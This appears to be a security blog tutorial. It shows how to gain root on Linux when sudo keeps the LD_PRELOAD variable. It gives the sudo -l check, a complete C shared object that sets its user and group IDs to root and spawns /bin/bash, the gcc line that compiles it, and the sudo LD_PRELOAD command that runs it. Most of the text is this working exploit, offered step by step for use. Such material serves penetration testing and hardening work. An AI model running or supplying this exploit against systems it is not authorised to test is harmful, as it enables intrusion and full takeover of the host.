Skip to content

Sudo (LD_PRELOAD) (Linux Privilege Escalation)

Privilege Escalation from an LD_PRELOAD environment variable. Before exploit let’s read something about LD_PRELOAD environment Variable.

Index

  1. What is LD_PRELOAD?
  2. Detection.
  3. Exploit LD_PRELOAD.

What is LD_PRELOAD?

LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.

To avoid this mechanism being using as an attack vector for suid/sgid executable binaries, the loader ignores LD_PRELOAD if ruid != euid. For such binaries, only libraries in standard paths that are also suid/sgid will be preloaded.

For More click here.


Detection

Fire up terminal and type:

user@debian:~$ sudo -l 
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD

If output something like this, congratulations target is vulnerable and you can exploit LD_PRELOAD issue to get root privilege shell and to acomplished privilege escalation you also need some sudo permission  binary which use LD_PRELOAD envr.

some Sudo command which can be done current user .

Program File :

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

Exploit LD_PRELOAD.

open terminal and go to any Writable Directory for dropping shell.

writtable directory like 

  • /tmp
  • /var/tmp
  • /dev/shm

in our case we using /tmp directory.

Drop a evil.c using any text editor, here we used cat for droping shell.

user@debian:/tmp$ cat << EOF >> evil.c
> #include <stdio.h>
> #include <sys/types.h>
> #include <stdlib.h>
> void _init() {
> unsetenv("LD_PRELOAD");
> setgid(0);
> setuid(0);
> system("/bin/bash");
> }
> EOF

lest Compile and make object file.

gcc -fPIC -shared -o evil.so evil.c -nostartfiles

Time to final step 3:)

sudo LD_PRELOAD=evil.so <COMMAND>

here <COMMAND> mean which command have u allowed to do with sudo.

you can use any sudo command which allowed to current user.

BooOO00m You got Root SHELL..


Thanks For Reading Comment below your Feedback and suggestion.

 

 

Spread the Knowledge
Published inPost ExploitPrivilege Escalation

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *